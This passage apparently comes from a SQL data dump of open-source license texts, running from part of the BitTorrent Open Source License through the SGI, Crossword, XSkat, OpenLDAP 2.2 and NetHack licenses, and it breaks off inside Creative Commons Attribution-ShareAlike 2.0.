under\nthe terms of this License, the Source Code of the Licensed Product and any\nModifications that you distribute, either on the same media as you distribute\nany executable or other form of the Licensed Product, or via a mechanism generally\naccepted in the software development community for the electronic transfer\nof data (an \"Electronic Distribution Mechanism\"). The Source Code for any\nversion of Licensed Product or Modifications that you distribute must remain\navailable for as long as any executable or other form of the Licensed Product\nis distributed by you. You are responsible for ensuring that the Source Code\nversion remains available even if the Electronic Distribution Mechanism is\nmaintained by a third party.\n\n c. Intellectual Property Matters.\n\ni. Third Party Claims. If you have knowledge that a license to a third party\'s\nintellectual property right is required to exercise the rights granted by\nthis License, you must include a text file with the Source Code distribution\ntitled \"LEGAL\" that describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after you make any Modifications available as described in\nSection 4(b), you shall promptly modify the LEGAL file in all copies you make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Licensed Product from you that new knowledge has been obtained.\n\nii. Contributor APIs. If your Modifications include an application programming\ninterface (\"API\") and you have knowledge of patent licenses that are reasonably\nnecessary to implement that API, you must also include this information in\nthe LEGAL file.\n\niii. Representations. You represent that, except as disclosed pursuant to\n4(c)(i) above, you believe that any Modifications you distribute are your\noriginal creations and that you have sufficient rights to grant the rights\nconveyed by this License.\n\nd. Required Notices. You must duplicate this License in any documentation\nyou provide along with the Source Code of any Modifications you create or\nto which you contribute, and which you distribute, wherever you describe recipients\'\nrights relating to Licensed Product. You must duplicate the notice contained\nin Exhibit A (the \"Notice\") in each file of the Source Code of any copy you\ndistribute of the Licensed Product. If you created a Modification, you may\nadd your name as a Contributor to the Notice. If it is not possible to put\nthe Notice in a particular Source Code file due to its structure, then you\nmust include such Notice in a location (such as a relevant directory file)\nwhere a user would be likely to look for such a notice. You may choose to\noffer, and charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Licensed Product. However, you may do so only\non your own behalf, and not on behalf of the Licensor or any Contributor.\nYou must make it clear that any such warranty, support, indemnity or liability\nobligation is offered by you alone, and you hereby agree to indemnify the\nLicensor and every Contributor for any liability incurred by the Licensor\nor such Contributor as a result of warranty, support, indemnity or liability\nterms you offer.\n\ne. Distribution of Executable Versions. You may distribute Licensed Product\nas an executable program under a license of your choice that may contain terms\ndifferent from this License provided (i) you have satisfied the requirements\nof Sections 4(a) through 4(d) for that distribution, (ii) you include a conspicuous\nnotice in the executable version, related documentation and collateral materials\nstating that the Source Code version of the Licensed Product is available\nunder the terms of this License, including a description of how and where\nyou have fulfilled the obligations of Section 4(b), and (iii) you make it\nclear that any terms that differ from this License are offered by you alone,\nnot by Licensor or any Contributor. You hereby agree to indemnify the Licensor\nand every Contributor for any liability incurred by Licensor or such Contributor\nas a result of any terms you offer.\n\nf. Distribution of Derivative Works. You may create Derivative Works (e.g.,\ncombinations of some or all of the Licensed Product with other code) and distribute\nthe Derivative Works as products under any other license you select, with\nthe proviso that the requirements of this License are fulfilled for those\nportions of the Derivative Works that consist of the Licensed Product or any\nModifications thereto.\n\ng. Compensation for Distribution of Executable Versions of Licensed Products,\nModifications or Derivative Works. Notwithstanding any provision of this License\nto the contrary, by distributing, selling, licensing, sublicensing or otherwise\nmaking available any Licensed Product, or Modification or Derivative Work\nthereof, you and Licensor hereby acknowledge and agree that you may sell,\nlicense or sublicense for a fee, accept donations or otherwise receive compensation\nfor executable versions of a Licensed Product, without paying a royalty or\nother fee to the Licensor or any other Contributor, provided that such executable\nversions (i) contain your or another Contributor\'s material Modifications,\nor (ii) are otherwise material Derivative Works. For purposes of this License,\nan executable version of the Licensed Product will be deemed to contain a\nmaterial Modification, or will otherwise be deemed a material Derivative Work,\nif (a) the Licensed Product is modified with your own or a third party\'s software\nprograms or other code, and/or the Licensed Product is combined with a number\nof your own or a third party\'s software programs or code, respectively, and\n(b) such software programs or code add or contribute material value, functionality\nor features to the License Product. For the avoidance of doubt, to the extent\nyour executable version of a Licensed Product does not contain your or another\nContributor\'s material Modifications or is otherwise not a material Derivative\nWork, in each case as contemplated herein, you may not sell, license or sublicense\nfor a fee, accept donations or otherwise receive compensation for such executable.\nAdditionally, without limitation of the foregoing and notwithstanding any\nprovision of this License to the contrary, you cannot charge for, sell, license\nor sublicense for a fee, accept donations or otherwise receive compensation\nfor the Source Code.\n\n5. Inability to Comply Due to Statute or Regulation. If it is impossible for\nyou to comply with any of the terms of this License with respect to some or\nall of the Licensed Product due to statute, judicial order, or regulation,\nthen you must (i) comply with the terms of this License to the maximum extent\npossible, (ii) cite the statute or regulation that prohibits you from adhering\nto the License, and (iii) describe the limitations and the code they affect.\nSuch description must be included in the LEGAL file described in Section 4(d),\nand must be included with all distributions of the Source Code. Except to\nthe extent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill at computer programming to be able\nto understand it.\n\n6. Application of This License. This License applies to code to which Licensor\nor Contributor has attached the Notice in Exhibit A, which is incorporated\nherein by this reference.\n\n 7. Versions of This License.\n\na. New Versions. Licensor may publish from time to time revised and/or new\nversions of the License.\n\nb. Effect of New Versions. Once Licensed Product has been published under\na particular version of the License, you may always continue to use it under\nthe terms of that version, provided that any such license be in full force\nand effect at the time, and has not been revoked or otherwise terminated.\nYou may also choose to use such Licensed Product under the terms of any subsequent\nversion (but not any prior version) of the License published by Licensor.\nNo one other than Licensor has the right to modify the terms applicable to\nLicensed Product created under this License.\n\nc. Derivative Works of this License. If you create or use a modified version\nof this License, which you may do only in order to apply it to software that\nis not already a Licensed Product under this License, you must rename your\nlicense so that it is not confusingly similar to this License, and must make\nit clear that your license contains terms that differ from this License. In\nso naming your license, you may not use any trademark of Licensor or any Contributor.\n\n8. Disclaimer of Warranty. LICENSED PRODUCT IS PROVIDED UNDER THIS LICENSE\nON AN AS IS BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nINCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE LICENSED PRODUCT IS FREE\nOF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING.\nTHE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LICENSED PRODUCT\nIS WITH YOU. SHOULD LICENSED PRODUCT PROVE DEFECTIVE IN ANY RESPECT, YOU (AND\nNOT THE LICENSOR OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN\nESSENTIAL PART OF THIS LICENSE. NO USE OF LICENSED PRODUCT IS AUTHORIZED HEREUNDER\nEXCEPT UNDER THIS DISCLAIMER.\n\n 9. Termination.\n\na. Automatic Termination Upon Breach. This license and the rights granted\nhereunder will terminate automatically if you fail to comply with the terms\nherein and fail to cure such breach within ten (10) days of being notified\nof the breach by the Licensor. For purposes of this provision, proof of delivery\nvia email to the address listed in the \'WHOIS\' database of the registrar for\nany website through which you distribute or market any Licensed Product, or\nto any alternate email address which you designate in writing to the Licensor,\nshall constitute sufficient notification. All sublicenses to the Licensed\nProduct that are properly granted shall survive any termination of this license\nso long as they continue to complye with the terms of this License. Provisions\nthat, by their nature, must remain in effect beyond the termination of this\nLicense, shall survive.\n\nb. Termination Upon Assertion of Patent Infringement. If you initiate litigation\nby asserting a patent infringement claim (excluding declaratory judgment actions)\nagainst Licensor or a Contributor (Licensor or Contributor against whom you\nfile such an action is referred to herein as Respondent) alleging that Licensed\nProduct directly or indirectly infringes any patent, then any and all rights\ngranted by such Respondent to you under Sections 1 or 2 of this License shall\nterminate prospectively upon sixty (60) days notice from Respondent (the \"Notice\nPeriod\") unless within that Notice Period you either agree in writing (i)\nto pay Respondent a mutually agreeable reasonably royalty for your past or\nfuture use of Licensed Product made by such Respondent, or (ii) withdraw your\nlitigation claim with respect to Licensed Product against such Respondent.\nIf within said Notice Period a reasonable royalty and payment arrangement\nare not mutually agreed upon in writing by the parties or the litigation claim\nis not withdrawn, the rights granted by Licensor to you under Sections 1 and\n2 automatically terminate at the expiration of said Notice Period.\n\nc. Reasonable Value of This License. If you assert a patent infringement claim\nagainst Respondent alleging that Licensed Product directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by said Respondent under Sections 1 and 2 shall\nbe taken into account in determining the amount or value of any payment or\nlicense.\n\nd. No Retroactive Effect of Termination. In the event of termination under\nSections 9(a) or 9(b) above, all end user license agreements (excluding licenses\nto distributors and resellers) that have been validly granted by you or any\ndistributor hereunder prior to termination shall survive termination.\n\n10. Limitation of Liability. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR,\nANY CONTRIBUTOR, OR ANY DISTRIBUTOR OF LICENSED PRODUCT, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTYS NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n11. Responsibility for Claims. As between Licensor and Contributors, each\nparty is responsible for claims and damages arising, directly or indirectly,\nout of its utilization of rights under this License. You agree to work with\nLicensor and Contributors to distribute such responsibility on an equitable\nbasis. Nothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n12. U.S. Government End Users. The Licensed Product is a commercial item,\nas that term is defined in 48 C.F.R. 2.101 (Oct. 1995), consisting of commercial\ncomputer software and commercial computer software documentation, as such\nterms are used in 48 C.F.R. 12.212 (Sept. 1995). Consistent with 48 C.F.R.\n12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4 (June 1995), all U.S. Government\nEnd Users acquire Licensed Product with only those rights set forth herein.\n\n13. Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable. This License shall be governed by California law provisions\n(except to the extent applicable law, if any, provides otherwise), excluding\nits conflict-of-law provisions. You expressly agree that in any litigation\nrelating to this license the losing party shall be responsible for costs including,\nwithout limitation, court costs and reasonable attorneys fees and expenses.\nThe application of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any law or regulation that provides that\nthe language of a contract shall be construed against the drafter shall not\napply to this License.\n\n14. Definition of You in This License. You throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 7. For legal entities, you includes any\nentity that controls, is controlled by, is under common control with, or affiliated\nwith, you. For purposes of this definition, control means (i) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (ii) ownership of fifty percent (50%) or more\nof the outstanding shares, or (iii) beneficial ownership of such entity. You\nare responsible for advising any affiliated entity of the terms of this License,\nand that any rights or privileges derived from or obtained by way of this\nLicense are subject to the restrictions outlined herein.\n\n15. Glossary. All defined terms in this License that are used in more than\none Section of this License are repeated here, in alphabetical order, for\nthe convenience of the reader. The Section of this License in which each defined\nterm is first used is shown in parentheses.\n\nContributor: Each person or entity who created or contributed to the creation\nof, and distributed, a Modification. (See Section 2)\n\nDerivative Works: That term as used in this License is defined under U.S.\ncopyright law. (See Section 1(b))\n\nLicense: This BitTorrent Open Source License. (See first paragraph of License)\n\nLicensed Product: Any BitTorrent Product licensed pursuant to this License.\nThe term \"Licensed Product\" includes all previous Modifications from any Contributor\nthat you receive. (See first paragraph of License and Section 2)\n\n Licensor: BitTorrent, Inc. (See first paragraph of License)\n\nModifications: Any additions to or deletions from the substance or structure\nof (i) a file containing Licensed\n\nProduct, or (ii) any new file that contains any part of Licensed Product.\n(See Section 2)\n\n Notice: The notice contained in Exhibit A. (See Section 4(e))\n\nSource Code: The preferred form for making modifications to the Licensed Product,\nincluding all modules contained therein, plus any associated interface definition\nfiles, scripts used to control compilation and installation of an executable\nprogram, or a list of differential comparisons against the Source Code of\nthe Licensed Product. (See Section 1(a))\n\n You: This term is defined in Section 14 of this License. EXHIBIT A\n\nThe Notice below must appear in each file of the Source Code of any copy you\ndistribute of the Licensed Product or any hereto. Contributors to any Modifications\nmay add their own copyright notices to identify their own contributions.\n\nLicense:\n\nThe contents of this file are subject to the BitTorrent Open Source License\nVersion 1.1 (the License). You may not copy or use this file, in either source\ncode or executable form, except in compliance with the License. You may obtain\na copy of the License at http://www.bittorrent.com/license/.\n\nSoftware distributed under the License is distributed on an AS IS basis, WITHOUT\nWARRANTY OF ANY KIND, either express or implied. See the License for the specific\nlanguage governing rights and limitations under the License.\n\nBitTorrent, Inc.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(252,'SGI-B-2.0','SGI FREE SOFTWARE LICENSE B\n\n(Version 2.0, Sept. 18, 2008)\n\nCopyright (C) [dates of first publication] Silicon Graphics, Inc. All Rights\nReserved.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice including the dates of first publication and either\nthis permission notice or a reference to http://oss.sgi.com/projects/FreeB/\nshall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL SILICON GRAPHICS,\nINC. BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nExcept as contained in this notice, the name of Silicon Graphics, Inc. shall\nnot be used in advertising or otherwise to promote the sale, use or other\ndealings in this Software without prior written authorization from Silicon\nGraphics, Inc.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(253,'Crossword','Copyright (C) 1995-2009 Gerd Neugebauer\n\ncwpuzzle.dtx is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY. No author or distributor accepts responsibility to anyone for\nthe consequences of using it or for whether it serves any particular purpose\nor works at all, unless he says so in writing.\n\n.\n\nEveryone is granted permission to copy, modify and redistribute cwpuzzle.dtx,\nprovided this copyright notice is preserved and any modifications are indicated.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(254,'XSkat','This program is free software; you can redistribute it freely.\n\nUse it at your own risk; there is NO WARRANTY.\n\nRedistribution of modified versions is permitted provided that the following\nconditions are met:\n\n 1. All copyright & permission notices are preserved.\n\n 2.a) Only changes required for packaging or porting are made.\n\n or\n\n2.b) It is clearly stated who last changed the program. The program is renamed\nor the version number is of the form x.y.z, where x.y is the version of the\noriginal program and z is an arbitrary suffix.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(255,'OLDAP-2.2','The OpenLDAP Public License\n\nVersion 2.2, 1 March 2000\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\n\n4. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation.\n\n5. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\n6. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent the license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nOpenLDAP is a trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2000, The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distributed verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(256,'NGPL','NETHACK GENERAL PUBLIC LICENSE\n\n(Copyright 1989 M. Stephenson)\n\n(Based on the BISON general public license, copyright 1988 Richard M. Stallman)\n\nEveryone is permitted to copy and distribute verbatim copies of this license,\nbut changing it is not allowed. You can also use this wording to make the\nterms for other programs.\n\nThe license agreements of most software companies keep you at the mercy of\nthose companies. By contrast, our general public license is intended to give\neveryone the right to share NetHack. To make sure that you get the rights\nwe want you to have, we need to make restrictions that forbid anyone to deny\nyou these rights or to ask you to surrender the rights. Hence this license\nagreement.\n\nSpecifically, we want to make sure that you have the right to give away copies\nof NetHack, that you receive source code or else can get it if you want it,\nthat you can change NetHack or use pieces of it in new free programs, and\nthat you know you can do these things.\n\nTo make sure that everyone has such rights, we have to forbid you to deprive\nanyone else of these rights. For example, if you distribute copies of NetHack,\nyou must give the recipients all the rights that you have. You must make sure\nthat they, too, receive or can get the source code. And you must tell them\ntheir rights.\n\nAlso, for our own protection, we must make certain that everyone finds out\nthat there is no warranty for NetHack. If NetHack is modified by someone else\nand passed on, we want its recipients to know that what they have is not what\nwe distributed.\n\nTherefore we (Mike Stephenson and other holders of NetHack copyrights) make\nthe following terms which say what you must do to be allowed to distribute\nor change NetHack.\n\nCOPYING POLICIES\n\n1. You may copy and distribute verbatim copies of NetHack source code as you\nreceive it, in any medium, provided that you keep intact the notices on all\nfiles that refer to copyrights, to this License Agreement, and to the absence\nof any warranty; and give any other recipients of the NetHack program a copy\nof this License Agreement along with the program.\n\n2. You may modify your copy or copies of NetHack or any portion of it, and\ncopy and distribute such modifications under the terms of Paragraph 1 above\n(including distributing this License Agreement), provided that you also do\nthe following:\n\na) cause the modified files to carry prominent notices stating that you changed\nthe files and the date of any change; and\n\nb) cause the whole of any work that you distribute or publish, that in whole\nor in part contains or is a derivative of NetHack or any part thereof, to\nbe licensed at no charge to all third parties on terms identical to those\ncontained in this License Agreement (except that you may choose to grant more\nextensive warranty protection to some or all third parties, at your option)\n\nc) You may charge a distribution fee for the physical act of transferring\na copy, and you may at your option offer warranty protection in exchange for\na fee.\n\n3. You may copy and distribute NetHack (or a portion or derivative of it,\nunder Paragraph 2) in object code or executable form under the terms of Paragraphs\n1 and 2 above provided that you also do one of the following:\n\na) accompany it with the complete machine-readable source code, which must\nbe distributed under the terms of Paragraphs 1 and 2 above; or,\n\nb) accompany it with full information as to how to obtain the complete machine-readable\nsource code from an appropriate archive site. (This alternative is allowed\nonly for noncommercial distribution.)\n\nFor these purposes, complete source code means either the full source distribution\nas originally released over Usenet or updated copies of the files in this\ndistribution used to create the object code or executable.\n\n4. You may not copy, sublicense, distribute or transfer NetHack except as\nexpressly provided under this License Agreement. Any attempt otherwise to\ncopy, sublicense, distribute or transfer NetHack is void and your rights to\nuse the program under this License agreement shall be automatically terminated.\nHowever, parties who have received computer software programs from you with\nthis License Agreement will not have their licenses terminated so long as\nsuch parties remain in full compliance.\n\nStated plainly: You are permitted to modify NetHack, or otherwise use parts\nof NetHack, provided that you comply with the conditions specified above;\nin particular, your modified NetHack or program containing parts of NetHack\nmust remain freely available as provided in this License Agreement. In other\nwords, go ahead and share NetHack, but don\'t try to stop anyone else from\nsharing it farther.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(257,'CC-BY-SA-2.0','Creative Commons Attribution-ShareAlike 2.0 CREATIVE COMMONS CORPORATION IS\nNOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE\nDOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES\nTHIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\ng. \"License Elements\" means the following high-level license attributes as\nselected by Licensor and indicated in the title of this License: Attribution,\nShareAlike.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works.\n\n e. For the avoidance of doubt, where the work is a musical composition:\n\ni. Performance Royalties Under Blanket Licenses. Licensor waives the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work.\n\nii. Mechanical Rights and Statutory Royalties. Licensor waives the exclusive\nright to collect, whether individually or via a music rights society or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions).\n\nf. Webcasting Rights and Statutory Royalties. For the avoidance of doubt,\nwhere the Work is a sound recording, Licensor waives the exclusive right to\ncollect, whether individually or via a performance-rights society (e.g. SoundExchange),\nroyalties for the public digital performance (e.g. webcast) of the Work, subject\nto the compulsory license created by 17 USC Section 114 of the US Copyright\nAct (or the equivalent in other jurisdictions).\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may distribute, publicly display, publicly perform, or publicly digitally\nperform a Derivative Work only under the terms of this License, a later version\nof this License with the same License Elements as this License, or a Creative\nCommons iCommons license that contains the same License Elements as this License\n(e.g. Attribution-ShareAlike 2.0 Japan). You must include a copy of, or the\nUniform Resource Identifier for, this License or other license specified in\nthe previous sentence with every copy or phonorecord of each Derivative Work\nYou distribute, publicly display, publicly perform, or publicly digitally\nperform. You may not offer or impose any terms on the Derivative Works that\nalter or restrict the terms of this License or the recipients\' exercise of\nthe rights granted hereunder, and You must keep intact all notices that refer\nto this License and to the disclaimer of warranties. You may not distribute,\npublicly display, publicly perform, or publicly digitally perform the Derivative\nWork with any technological measures that control access or use of the Work\nin a manner inconsistent with the terms of this License Agreement. The above\napplies to the Derivative Work as incorporated in a Collective Work, but this\ndoes not require the Collective Work apart from the Derivative Work itself\nto be made subject to the terms of this License.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; to the extent reasonably practicable, the Uniform\nResource Identifier, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS THE\nWORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT\nLIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR\nPURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY,\nOR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS\nDO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT\nAPPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT 